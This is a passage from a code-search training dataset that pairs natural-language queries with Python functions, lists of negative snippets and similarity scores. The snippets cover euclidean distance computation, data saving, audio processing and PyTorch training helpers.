\"trainset_28spk_txt\")\r\n test_clean_folder = os.path.join(data_folder, \"clean_testset_wav_16k\")\r\n test_noisy_folder = os.path.join(data_folder, \"noisy_testset_wav_16k\")\r\n test_txts = os.path.join(data_folder, \"testset_txt\")\r\n\r\n # Setting the save folder\r\n if not os.path.exists(save_folder):\r\n os.makedirs(save_folder)\r\n\r\n # Additional checks to make sure the data folder contains Voicebank\r\n check_voicebank_folders(\r\n train_clean_folder,\r\n train_noisy_folder,\r\n train_txts,\r\n test_clean_folder,\r\n test_noisy_folder,\r\n test_txts,\r\n )\r\n\r\n logger.debug(\"Creating lexicon...\")\r\n lexicon = create_lexicon(os.path.join(data_folder, \"lexicon.txt\"))\r\n logger.info(\"Creating json files for noisy VoiceBank...\")\r\n\r\n logger.debug(\"Collecting files...\")\r\n extension = [\".wav\"]\r\n valid_speakers = TRAIN_SPEAKERS[:valid_speaker_count]\r\n wav_lst_train = get_all_files(\r\n train_noisy_folder, match_and=extension, exclude_or=valid_speakers,\r\n )\r\n wav_lst_valid = get_all_files(\r\n train_noisy_folder, match_and=extension, match_or=valid_speakers,\r\n )\r\n wav_lst_test = get_all_files(test_noisy_folder, match_and=extension)\r\n\r\n logger.debug(\"Creating json files for noisy VoiceBank...\")\r\n create_json(\r\n wav_lst_train, save_json_train, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_valid, save_json_valid, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_test, save_json_test, test_clean_folder, test_txts, lexicon\r\n )", "def _download(self, path):\n self.logger.info('Getting Million Song Dataset...')\n self.logger.info('Downloading Echo Nest Taste Subprofile train data...')\n base_url = 'http://millionsongdataset.com/sites/default/files/challenge/'\n\n download_dataset(\n base_url + 'train_triplets.txt.zip',\n join(self.data_folder, 'train.zip')\n )\n rename(join(self.data_folder, 'train'), path)\n\n self.logger.info('Downloading evaluation data for MSD Challenge...')\n download_dataset(\n base_url + 'EvalDataYear1MSDWebsite.zip',\n join(path, 
'eval.zip')\n )\n rename(\n join(path, 'EvalDataYear1MSDWebsite'),\n join(path, 'evaluation')\n )\n\n self.logger.info('Downloading list of matching errors...')\n url = 'http://millionsongdataset.com/sites/default/files/tasteprofile/sid_mismatches.txt'\n download_url(url, join(path, 'sid_mismatches.txt'))", "def export_data(self):\n folder = os.path.dirname(self.filename[0])\n filename_ext = os.path.basename(self.filename[0])\n filename = os.path.splitext(filename_ext)[0] #get filename without extension\n\n path = folder + \"/\" + filename + \"_fit_results.txt\"\n if not os.path.exists(path):\n file = open(path, \"w+\")\n else:\n file = open(path, \"a+\")\n\n for i in range(len(self.data_list)):\n file.write(self.data_list[i] + \"\\n\\n\")\n\n self.data_list = []\n file.close()", "def create_melspectrogram_dataset(label_folder='electronic_music/Trance_label/Train/', save_folder='song_mel_label_data',\n sr=44100, n_mels=128, n_fft=2048, hop_length=512, song_duration=180.0,\n create_data=False):\n if create_data:\n # get list of all labels\n os.makedirs(save_folder, exist_ok=True)\n labels = [path for path in os.listdir(label_folder) if os.path.isdir(label_folder + path)]\n\n # iterate through all lables, songs and find mel spectrogram\n for label in labels:\n print('{} \\n'.format(label))\n label_path = os.path.join(label_folder, label)\n label_songs = os.listdir(label_path)\n\n for song in label_songs:\n print(song)\n song_path = os.path.join(label_path, song)\n\n # Create mel spectrogram for song_duration in the middle of the song and convert it to the log scale\n audio = MP3(song_path)\n audio_lenght = int(audio.info.length)\n audio_middle = (audio_lenght - int(song_duration))/2\n y, sr = librosa.load(song_path, sr=sr, offset=audio_middle, duration=song_duration)\n S = librosa.feature.melspectrogram(y, sr=sr, n_mels=n_mels, n_fft=n_fft, hop_length=hop_length)\n log_S = librosa.logamplitude(S, ref_power=1.0)\n data = (label, log_S, song)\n\n # Save each song\n save_name = label + '_%%-%%_' + song\n with open(os.path.join(save_folder, save_name), 'wb') as fp:\n dill.dump(data, fp)", "def save_separated_audio(self, audios, filename):\n\n # Create folder with mixture name\n folder_path = os.path.join(self.config[\"separated_audio_folder\"], os.path.splitext(filename)[0])\n os.makedirs(folder_path)\n # Save each separated source\n for class_idx, audio in enumerate(audios):\n librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',\n audio.T,\n sr=self.data_set.config[\"sampling_rate\"])\n # Also copy the mixture in the folder\n copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, \"original_mix.wav\"))", "def save_data_to_disk(self):\n Omega_M = self.theta_fid[0]\n for key in self.data.keys():\n np.save(f'./preloaded_data/{Omega_M}_{self.delta_theta[0]}_{key}.npy', self.data[key])", "def dump_pinball_music():\n\texport_sounds(song_labels, os.path.join(conf.path, 'music'), 'Music_')", "def process_wav_files(wav_dir, id_list, out_dir, calc_mvn):\n file_ids = utils.get_file_ids(wav_dir, id_list)\n\n os.makedirs(os.path.join(out_dir, 'f0'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'lf0'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'vuv'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'sp'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'ap'), exist_ok=True)\n\n @utils.multithread\n def save_wav_to_files(file_id):\n wav_path = os.path.join(wav_dir, '{}.wav'.format(file_id))\n wav = 
wav_features.Wav(wav_path)\n\n f0, vuv, sp, ap = wav.extract_features()\n\n file_io.save_bin(f0, os.path.join(out_dir, 'f0', '{}.f0'.format(file_id)))\n file_io.save_bin(np.log(f0), os.path.join(out_dir, 'lf0', '{}.lf0'.format(file_id)))\n file_io.save_bin(vuv, os.path.join(out_dir, 'vuv', '{}.vuv'.format(file_id)))\n file_io.save_bin(sp, os.path.join(out_dir, 'sp', '{}.sp'.format(file_id)))\n file_io.save_bin(ap, os.path.join(out_dir, 'ap', '{}.ap'.format(file_id)))\n\n save_wav_to_files(file_ids)\n\n if calc_mvn:\n calclate_mvn_parameters(out_dir, 'f0', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'lf0', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'vuv', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'sp', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'ap', id_list=id_list, dtype=np.float32)", "def save_results(self, *args):\n try:\n filename = args[0]\n except IndexError:\n filename = self.filename\n results = {}\n results['gp_pred'] = self.gp_predictions\n results['func_val'] = self.target_func_vals\n results['inds_all'] = np.array(self.indices_all)\n results['vals_all'] = np.array(self.vals_all)\n np.save(filename+\".npy\", results)", "def get_filenames(mode, data_dir):\n if mode == 'train':\n return [os.path.join(data_dir, 'encoder.train.input'), os.path.join(data_dir, 'encoder.train.target'),\n os.path.join(data_dir, 'decoder.train.target')]\n else:\n return [os.path.join(data_dir, 'encoder.test.input'), os.path.join(data_dir, 'encoder.test.target'),\n os.path.join(data_dir, 'decoder.test.target')]", "def write_predictions(prediction_dic, result_path):\n with open(result_path, 'wb') as outfile:\n outfile.write(bytes('Patient_ID,HPV/p16_status\\n', 'UTF-8'))\n for patient_id, pred in prediction_dic.items():\n outfile.write(bytes(str(patient_id) + ',' + str(pred) + '\\n', 'UTF-8'))", "def separate_voices_dir(dir_path, compare=True, extensions=['.mei', '.musicxml', '.mid']):\n files = [os.path.join(root, name)\n for root, dirs, files in os.walk(dir_path)\n for name in files\n if name.endswith((extensions))]\n\n i = 1\n file_result = {}\n for file in files[:20]:\n print('FILE', i, 'out of', len(files))\n print(file)\n i += 1\n\n score = m21.converter.parse(file)\n # find nb of voices\n nb_voices = get_number_of_voices(score)\n print('Nb of voices: ', nb_voices)\n\n # focus on scores with at most 4 voices\n if nb_voices < 5:\n score, total_cost = separate_voices_score(\n score, parameters=Parameters(max_voices=nb_voices))\n file_result[total_cost] = file\n\n with open('results.json', 'w') as outfile:\n json.dump(file_result, outfile, indent=4, sort_keys=True)" ]
[ "0.60163605", "0.60031205", "0.59263384", "0.588661", "0.58185124", "0.58125246", "0.5753232", "0.5715541", "0.56986034", "0.56940067", "0.56717575", "0.5634953", "0.5573612", "0.5497498", "0.5478532", "0.5429409", "0.5406123", "0.53959244", "0.53919566", "0.5375165", "0.5352405", "0.53425497", "0.53365695", "0.53198785", "0.53128135", "0.52843964", "0.5273146", "0.52530736", "0.5248159", "0.5221517", "0.52202594", "0.5217072", "0.52016574", "0.5199738", "0.5191862", "0.51853216", "0.5184447", "0.5182034", "0.516757", "0.516461", "0.5164111", "0.5152989", "0.515181", "0.515017", "0.5146391", "0.5140898", "0.513349", "0.51325554", "0.5132016", "0.51301575", "0.5125124", "0.5122331", "0.5121192", "0.5105907", "0.510208", "0.5099301", "0.5097638", "0.50963455", "0.5090598", "0.5088189", "0.5085971", "0.50805944", "0.50604653", "0.5056288", "0.50559926", "0.5054469", "0.5046819", "0.5038054", "0.5026414", "0.5023255", "0.50098884", "0.500782", "0.5006028", "0.5004621", "0.50019747", "0.5000529", "0.5000046", "0.49992907", "0.49934152", "0.49933255", "0.49880368", "0.49879327", "0.4986277", "0.49829134", "0.49814817", "0.49736163", "0.49678844", "0.4965487", "0.4964913", "0.49605575", "0.49589097", "0.4958075", "0.49446756", "0.49431658", "0.49416274", "0.49371123", "0.493708", "0.4934755", "0.493341", "0.49329793" ]
0.6846945
0
Compute the euclidean distance between two numpy vectors
def euclidean_distance(a, b): return np.linalg.norm(a - b)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def euclidean_distance(vec1, vec2):\n return numpy.linalg.norm(vec1 - vec2)", "def euclidean_distance_no_np(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return sum((v1 - v2) ** 2 for v1, v2 in zip(vector_1, vector_2)) ** (1 / 2)", "def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n distance_vector: np.ndarray = x - y\n distance = compute_norm(distance_vector)\n return distance", "def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n\n distance = np.linalg.norm(x - y)\n\n return distance", "def compute_euclidean_dist(vec1, vec2):\r\n assert len(vec1) == len(vec2)\r\n vec1 = np.array(vec1)\r\n vec2 = np.array(vec2)\r\n return np.sqrt(np.sum(np.square(vec2 - vec1)))", "def euclidean_distance(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return np.sqrt(np.sum((np.asarray(vector_1) - np.asarray(vector_2)) ** 2))", "def euclidean_distance(x1: np.ndarray, x2: np.ndarray) -> float:\n return np.sqrt(np.square(x1 - x2).sum())", "def get_euclid_dist(vec_1, vec_2):\n\n\treturn np.sqrt(np.sum(np.fabs(vec_1 - vec_2), axis=1)).flatten()", "def _vector_dist(self, vec1, vec2):\r\n return sqrt(sum([(float(v1) - float(v2)) ** 2 for v1, v2 in\r\n zip(vec1, vec2)]))", "def euclidean_distance(vector_x, vector_y):\n if len(vector_x) != len(vector_y):\n raise Exception('Vectors must be same dimensions')\n return math.sqrt(sum((vector_x[dim] - vector_y[dim]) ** 2 for dim in range(len(vector_x))))", "def euclidian_distance(x: np.arrays, y: np.arrays):\r\n diff = x - np.mean(y, axis=0)\r\n return np.sqrt(np.dot(diff.T, diff))", "def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.square(np.subtract(x1, x2))))", "def euclidean_distance(vector1, vector2):\n e_dist = [(v1 - v2) ** 2 for v1, v2 in zip(vector1, vector2)]\n e_dist = math.sqrt(sum(e_dist))\n return e_dist", "def euclidean_dist_vec(y1, x1, y2, x2):\n\n # euclid's formula\n distance = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\n return distance", "def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.power(x1 - x2, 2)))", "def euclideanDistance(a, b):\n vec = [pow(a[i] - b[i], 2) for i in range(len(a)) if None not in [a[i],b[i]]]\n return (sum(vec) / len(vec)) if len(vec) > 0 else NaN", "def euclidean_distance(arr1,arr2):\n distance = np.sqrt(np.sum((arr1 - arr2)**2))\n return distance", "def euclidean_distance(x, y):\n return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))", "def eucl_dist(a, b):\n return np.sqrt( (a[0]-b[0])** 2 + (a[1]-b[1])** 2)", "def euclidean_distance(x1, x2):\n return (x2[0] - x1[0])**2 + (x2[1] - x1[1])**2", "def euclidean_distance(point1, point2):\n return np.linalg.norm(np.array(point1) - np.array(point2))", "def euclidean_distance(a, b):\n return sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)", "def EuclideanDistanceSq( self, a, b ):\n if not (type(a) == list or type(a) == Vector):\n a = [a]\n if not (type(b) == list or type(a) == Vector):\n b = [b]\n assert len(a) == len(b)\n sqDist = 0\n for x,y in zip(a,b):\n sqDist += (x-y)**2\n return sqDist", "def euclidean_distance(a: Tuple[float, ...], b: Tuple[float, ...]) -> float:\n assert len(a) == len(b)\n return sqrt(sum(pow(x[0] - x[1], 2) for x in zip(a, b)))", "def euclidean_distance(point_one, point_two):\n return np.linalg.norm(point_one-point_two)", "def edist(a, b):\n return euclidean(np.array(a), np.array(b))", "def euclidean(x, y):\n return np.sqrt(np.sum((x - y) ** 2))", "def distance(x,y):\n return np.sqrt( np.power(np.array(x) - np.array(y), 2).sum() )", "def euclidean_distance(x, y):\n distance = 0\n for i, j in zip(x, y):\n 
distance += (i - j) ** 2\n return math.sqrt(distance)", "def euclidean_distance(a, b, axis=1):\n return np.sum((a-b)**2, axis=axis)**.5\n #NOTE: the below be preferred for \"big\" comparisons in dim 1 of b\n #return np.apply_along_axis(np.linalg.norm, axis, doca-docb)", "def euclidean_dist(X, y):\n return np.sqrt(np.sum((X - y) ** 2, 1)) # broadcasted calculations", "def euclidean_metric(x, y):\n if len(x) != len(y):\n raise ValueError(\"Incompatible dimensions.\")\n return np.linalg.norm(x - y)\n \n # Or a slightly longer way:\n return np.sqrt(np.sum(np.subtract(x, y)**2))\n # Or the longest/worst way:\n total = 0\n for i in xrange(len(x)):\n term = x[i] - y[i]\n term = term**2\n total += term\n total = np.sqrt(total)\n return total", "def __dist(u, v):\n return spatial.distance.euclidean(u, v)", "def dist(v1: vect2d, v2: vect2d) -> float:\n d = ((v2.x - v1.x)**2 + (v2.y - v1.y)**2) ** 0.5\n return d", "def _euclid_distance(self, A, B, axis=1):\n return np.linalg.norm(A - B, axis=axis)", "def euclidean_distance(vector_1, vector_2) -> float:\n\n\n before_square_root = 0\n for i in range(len(vector_1)):\n before_square_root += (vector_1[i] - vector_2[i])**2\n\n d = math.sqrt(before_square_root)\n print(d)\n return(d)", "def euclidean(x,y): \n\treturn np.sqrt(np.sum((x-y)**2))", "def distance(a, b):\n return (np.sum((a - b)**2))**0.5", "def euclid_dist(p1, p2):\n \n return float(np.linalg.norm(np.array(p1)-np.array(p2)))", "def compare_vectors(v1, v2):\n if len(v1) == len(v2):\n distance = 0\n for i in xrange(len(v1)):\n distance += (v1[i] - v2[i]) ** 2\n return distance\n else:\n print \"vector not match in dimensions\"", "def euclidean(x,y):\n\tassert (isinstance(x, BayesNet) and isinstance(y, BayesNet)), 'Must pass in BayesNet objects.'\n\tassert (x==y), 'Passed-in BayesNet objects are not structurally equal.'\n\n\tdistance = np.sum( np.sqrt( ( x.flat_cpt() - y.flat_cpt() )**2 ) )\n\treturn distance", "def compute_feature_distances(features1: np.ndarray, \r\n features2: np.ndarray) -> np.ndarray:\r\n #broadcasting trick\r\n a = features1[:, np.newaxis, :]\r\n b = features2[np.newaxis, :, :]\r\n \r\n return np.linalg.norm( (a-b), axis=-1)", "def distance(p1, p2):\n return np.linalg.norm(np.array(p1) - np.array(p2))", "def GetDistance(vec1,vec2):\n diff = np.asarray(vec1) - np.asarray(vec2)\n squareDistance = np.dot(diff.T, diff)\n return math.sqrt(squareDistance)", "def euclidean_distance(s1,s2): \n tmpsum = 0\n \n for index,value in enumerate(s1):\n tmpsum += (s1[index]-s2[index])**2\n \n return math.sqrt(tmpsum)", "def euclidean_distance(x1, x2):\n\tdistance = 0\n\t# Squared distance between each coordinate\n\tfor i in range(len(x1)):\n\t\tdistance += pow((x1[i], x2[i]), 2)\n\treturn math.sqrt(distance)", "def euclidean_distance(p1, p2):\n distance = 0\n for i in range(len(p1)-1):\n distance += (p1[i]-p2[i])**(2)\n return sqrt(distance)", "def distance(a,b):\n return np.sqrt( (x(a)-x(b))**2 + (y(a)-y(b))**2 )", "def hellinger_dist(v1, v2):\n if len(v1) != len(v2):\n raise ValueError(\"Vectors should have the same size! 
\")\n return sqrt( sum( map(lambda e: \n (sqrt(e[0])-sqrt(e[1]))**2, zip(v1,v2))))/sqrt(2)", "def distance(a, b):\n return math.sqrt((a[0]-b[0])**2 + (a[1]-b[1])**2)", "def _euclidian_distance(self, x1, x2):\n a= x1-x2\n a2 = a**2\n b = np.sum(a2, axis=1)\n c = np.sqrt(b)\n return c", "def euclidean_distance(p1, p2):\n dist = np.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)\n return dist", "def distance_metric(u, v):\n if len(u) != len(v):\n raise Exception(\n \"Distance metric not valid for differently sized vectors\")\n sum = 0.\n for i in range(len(u)):\n sum += ((u[i] - v[i]) ** 2)\n return math.sqrt(sum)", "def compute_distance(node1, node2):\n return np.linalg.norm(node1 - node2)", "def dist(a, b):\n return np.sum((a-b)**2.0)**.5", "def dist_2D(v1, v2):\n return ((v1[0]-v2[0])**2 + (v1[1]-v2[1])**2 )**(0.5)", "def compute_distance (uVector, uOther):\n ## since each element can be either 0 or 1,\n ## no need for square roots and pow\n d = 0\n for i in range (len(uVector)):\n d = d + math.pow((int(uVector [i]) - int(uOther [i])), 2)\n\n return d", "def euclidean_distances(X, Y):\r\n\r\n D = np.zeros((X.shape[0],Y.shape[0]))\r\n \r\n for X_idx in range(X.shape[0]):\r\n for Y_idx in range(Y.shape[0]): \r\n \r\n D[X_idx,Y_idx] = np.sqrt(np.sum((X[X_idx,:]-Y[Y_idx,:])**2))\r\n \r\n return D", "def euclidean(p1, p2):\n return p1.distance(p2)", "def distance(self, vector1, vector2):\n\t\tsum_sq = 0\n\t\tfor i in range(28):\n\t\t\tfor j in range(28):\n\t\t\t\tsum_sq += (vector1[i][j] - vector2[i][j])**2\n\t\treturn math.sqrt(sum_sq)", "def euclidean_distance(point1, point2):\n\n return math.sqrt(sum([(x - y) ** 2 for x, y in zip(point1, point2)]))", "def distance(a,b): \r\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)", "def distance(p1, p2):\n return np.linalg.norm(p2-p1)", "def distance(v1, v2):\r\n return magnitude(*subtract(v2, v1))", "def GetDist(feature_1, feature_2):\n return np.linalg.norm(feature_1 - feature_2)", "def distance(a, b):\n return math.sqrt((b[0]-a[0])**2 + (b[1]-a[1])**2)", "def dist(v1, v2):\n return ( (v1[0] - v2[0])**2 + (v1[1] - v2[1])**2 )**0.5", "def distance(f1, f2):\n\n return np.sum((np.sum([f1, -f2], axis=0))**2, axis=1)", "def euclidean(x, y):\n ed = np.sqrt(np.sum((x-y)**2))\n # print ed\n return ed", "def dist2D(a, b):\n return ((a[0]-b[0])**2 + (a[1]-b[1])**2)**0.5", "def _euclideanDistance(A, B):\n if len(A) != len(B):\n raise ValueError(\"A and B must have the same number of dimensions\")\n sqr_dist = 0\n for i in range(len(A)):\n sqr_dist += (A[i] - B[i])**2\n return np.sqrt(sqr_dist)", "def calcEuclideanDistance(d1, d2):\n #initiate empty list\n result = []\n #for each index in the list, each position in both list minus each other\n #and to the power of two. 
Add this in the result list\n for idx in range(len(d1)):\n result.append((d1[idx]-d2[idx])**2)\n\n #Return the square of the sum of all values in the result list\n return math.sqrt(sum(result))", "def euclidean(self, other):\n return linalg.norm([self.x - other.x, self.y - other.y])", "def euclidean_distance(data1, data2):\n #Convert data into numpy array\n array1 = np.array(data1)\n array2 = np.array(data2)\n \n #Create distance array\n dist_array = np.sqrt(np.sum((array2-array1)**2, axis=1))\n \n #Reshape array before return results\n return np.reshape(dist_array, [len(dist_array),1])", "def _dist(A, B):\n return np.sqrt(np.einsum(\"ijk->ij\", (A[:, None, :] - B) ** 2))", "def get_euclidean_distance(p1, p2):\n return np.sqrt(np.power((p2[0] - p1[0]), 2) + np.power((p2[1] - p1[1]), 2))", "def distance(a, b):\n if len(a) > len(b):\n a = a[:len(b)]\n elif len(b) > len(a):\n b = b[:len(a)]\n\n ar = numpy.array(a)\n br = numpy.array(b)\n dist = numpy.linalg.norm(ar-br)\n\n return dist", "def get_distance(descriptive_vector1, descriptive_vector2 ):\n return np.linalg.norm(descriptive_vector1 - descriptive_vector2)", "def l2_distance(v1, v2):\n\treturn np.linalg.norm(np.array(v1) - np.array(v2))", "def euclid_dist(vec, mat):\n return np.linalg.norm(mat - vec, axis=1)", "def distance(a, b):\n dx = a[0] - b[0]\n dy = a[1] - b[1]\n\n return math.sqrt(dx*dx + dy*dy)", "def distance_point_point(a, b):\n ab = subtract_vectors(b, a)\n return length_vector(ab)", "def eucl_dist(x_0, y_0, x_1, y_1):\n return sqrt((x_1 - x_0)**2 + (y_1 - y_0)**2)", "def EuclideanDistance( self, a, b ):\n return sqrt( self.EuclideanDistanceSq(a,b) )", "def _get_distance(a, b):\n return np.sqrt(np.sum((a - b) ** 2))", "def distance(p0, p1):\n return( numpy.sqrt( (p0[0]-p1[0])**2 + \n (p0[1]-p1[1])**2 + \n (p0[2]-p1[2])**2 ) )", "def dist(self, one, two):\n return np.sqrt((one[0] - two[0]) ** 2 + (one[1] - two[1]) ** 2)", "def dist(a, b):\n return math.sqrt(pow(a[0] - b[0], 2) + pow(a[1] - b[1], 2))", "def _dist(x, y):\n return np.sqrt(np.mean(np.square(x - y)))", "def dist(first, other):\n if isinstance(first,FreeCAD.Vector) and isinstance(other,FreeCAD.Vector):\n return length(sub(first,other))", "def get_euclidean_vector(vector):\n\n return np.subtract(vector[1], vector[0])", "def norm_dist(face_vectors, f_vector):\n if len(face_vectors) == 0:\n return np.empty((0))\n return np.linalg.norm(face_vectors - f_vector, axis=1)", "def test_vector_dist(self):\r\n v1 = [1, 4, 2]\r\n v2 = [-1, 12, 4]\r\n\r\n exp = 8.48528137424\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)\r\n\r\n v1 = [1, 2, 100, 4, 2]\r\n v2 = [-1, 12, 4, 12, 99]\r\n\r\n exp = 137.087563258\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)", "def euclidean_distance(start, end):\n\n value = np.sqrt(np.sum(np.square(np.subtract(start, end)), axis=-1))\n return value", "def distance(self, u, v):\n numerator = np.dot(u,v)\n denominator = np.linalg.norm(u) * np.linalg.norm(v)\n similarity = numerator/(denominator +1e-7)\n return similarity", "def euclideanDistance(loc1, loc2):\n return math.sqrt(sum([(a - b) ** 2 for a, b in zip(loc1, loc2)]))", "def distance(a, b):\n return math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)", "def euclidean_distance(A, B):\n aa = T.sum(A * A, axis=1)\n bb = T.sum(B * B, axis=1)\n AB = T.dot(A, T.transpose(B))\n\n AA = T.transpose(T.tile(aa, (bb.shape[0], 1)))\n BB = T.tile(bb, (aa.shape[0], 1))\n\n D = AA + BB - 2 * AB\n\n # Sanity checks\n D = T.maximum(D, 0)\n D = T.sqrt(D)\n 
return D", "def dist_vec(x, y, cxy):\n x0 = cxy[0]\n y0 = cxy[1]\n x_dist = x - x0\n y_dist = y - y0\n dist = np.sqrt(x_dist ** 2 + y_dist ** 2)\n return dist", "def _euclidean_distance(self, points_a, points_b):\n assert len(points_a.shape) == 2\n assert len(points_b.shape) == 2\n\n transpose_b = points_b.T\n dot = np.dot(points_a, transpose_b)\n\n a_mode_sq = np.tile(\n (points_a ** 2).sum(-1, keepdims=True), (1, points_b.shape[0]))\n b_mode_sq = np.tile((transpose_b ** 2).sum(0, keepdims=True),\n (points_a.shape[0], 1))\n\n distance = np.sqrt(a_mode_sq + b_mode_sq - 2 * dot)\n return distance" ]
[ "0.8293001", "0.82679814", "0.8241531", "0.8164159", "0.8139716", "0.8110727", "0.8093996", "0.8087907", "0.80677295", "0.7933276", "0.79193497", "0.7915708", "0.7905538", "0.7787108", "0.7761666", "0.7725438", "0.76735663", "0.7641406", "0.75959605", "0.75740075", "0.75653476", "0.7564119", "0.7546421", "0.75155056", "0.7505864", "0.7470387", "0.7468808", "0.74614185", "0.7461348", "0.744596", "0.7437016", "0.7432117", "0.73862517", "0.73805165", "0.7356142", "0.73374504", "0.733591", "0.7320653", "0.73205805", "0.7319544", "0.7308073", "0.7306699", "0.73026186", "0.72810733", "0.7276327", "0.7261971", "0.7233207", "0.7229153", "0.7227733", "0.7226113", "0.7221546", "0.7220921", "0.7209405", "0.7198948", "0.71902126", "0.718443", "0.71815795", "0.7179247", "0.71746194", "0.71723473", "0.7169898", "0.71682245", "0.7166851", "0.7159566", "0.71505827", "0.7149712", "0.71461195", "0.7131098", "0.7130067", "0.7126345", "0.711279", "0.7105268", "0.70971036", "0.7072426", "0.7071723", "0.7068885", "0.70661855", "0.70506203", "0.7030955", "0.69989717", "0.69946617", "0.69894934", "0.6985432", "0.6980146", "0.6979083", "0.69774526", "0.69770473", "0.69671685", "0.6957396", "0.6955987", "0.6942412", "0.6938101", "0.6931861", "0.6924048", "0.6921816", "0.6915252", "0.69128597", "0.6912004", "0.69010246", "0.68965566" ]
0.8229706
3
Should call Module.train() on each torch.nn.Module, if present
def train(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def train(self) -> None:\n for module in self.modules.values():\n module.train()\n return", "def to_train(self):\n for _m in self.modules.values():\n _m.train()", "def set_train(self):\n for m in self.models.values():\n m.train()", "def train(self):\n self.ae_train(self.net0, self.ae0_optimizer, self.train0_loader, self.val_loader, name='Net0')\n self.ae_train(self.net1, self.ae1_optimizer, self.train1_loader, self.val_loader, name='Net1')\n self.ae_train(self.net2, self.ae2_optimizer, self.train2_loader, self.val_loader, name='Net2')\n\n self.classifier_train(self.net0, self.optimizer0, self.train0_loader, self.val_loader, name='Net0')\n self.classifier_train(self.net1, self.optimizer1, self.train1_loader, self.val_loader, name='Net1')\n self.classifier_train(self.net2, self.optimizer2, self.train2_loader, self.val_loader, name='Net2')", "def train(self):\n for name in self.network_names:\n if isinstance(name, str):\n net = getattr(self, 'net')\n net.train()", "def train(train_loader : torch.utils.data.DataLoader, model : nn.Module, criterion : nn.Module, optimizer : torch.optim.Optimizer) -> logger.Result:", "def train(self, mode=True, mc_dropout=False):\n self.training = mode\n for module_name, module in self.named_modules():\n module.training = mode\n if mc_dropout and not mode:\n if isinstance(module, nn.Dropout2d):\n # print(\"WARNING - nn.Module.train - {}\".format(module_name))\n module.training = True\n\n return self", "def initialize_training_false_recursive(module: Module) -> Module:\n if isinstance(module, (BatchNorm1d, BatchNorm2d, BatchNorm3d)):\n initialize_batch_norm_eval(module)\n else:\n for module_child in module.children():\n initialize_training_false_recursive(module_child)\n return module.train(False)", "def train(self, mode=True):\n super().train(mode)\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def load_networks(self, epoch: int) -> None:\n for name, module in self.modules.items():\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if isinstance(module, torch.nn.DataParallel):\n module = module.module\n print('loading the model from %s' % load_path)\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, module, key.split('.'))\n module.load_state_dict(state_dict)\n return", "def train(self, mode=True):\n super().train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def test():\n return _make_modules(is_train=False)", "def train(self, mode=True, freeze_bn=False):\n super(NetFeat, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def _train(self):\n step = 0\n for epoch in range(self.opts.num_epochs):\n self.hub.publish(Topic.EPOCH, epoch)\n for i, data in enumerate(self.loader):\n # Compute loss ...\n # NOTE(ycho): if one of the callbacks require training loss,\n # e.g. 
for logging, simply register a hook to the loss module\n # rather than trying to extract them here.\n loss = self.loss_fn(self.model, data)\n self.hub.publish(Topic.TRAIN_LOSS, loss)\n\n # Backprop + Optimize ...\n self.optim.zero_grad()\n loss[\"total\"].backward()\n self.optim.step()\n\n # Emit `step` event.\n # == logging, saving, evaluation\n self.hub.publish(Topic.STEP, step)\n step += 1\n\n if step >= self.opts.train_steps:\n return", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def train_one_cycle(self, module_dict: ModuleDict):\n array_dict: ArrayDict = self.sample_collector.collect_samples_by_number()\n n_batches = int(array_dict.n_examples / self.batch_size)\n for trainee in self.trainees:\n for epoch in range(trainee.n_epochs):\n all_idxs = np.random.choice(array_dict.n_examples, array_dict.n_examples, replace=False)\n batch_idxs = np.array_split(all_idxs, n_batches)\n tensor_dict: TensorDict = TensorDict()\n for batch_idx in batch_idxs:\n trainee.tensor_inserter.insert_tensor(tensor_dict, array_dict, module_dict, batch_idx)\n loss = trainee.loss_calculator.calculate_loss(tensor_dict)\n trainee.module_updater.update_module(loss)", "def train(entropy_fn):\n del entropy_fn # unused\n return _make_modules(is_train=True)", "def train(self):\n self.emission_model(self.train_data)\n self.transition_model(self.train_data)", "def test_init(self, epochs):\n i = 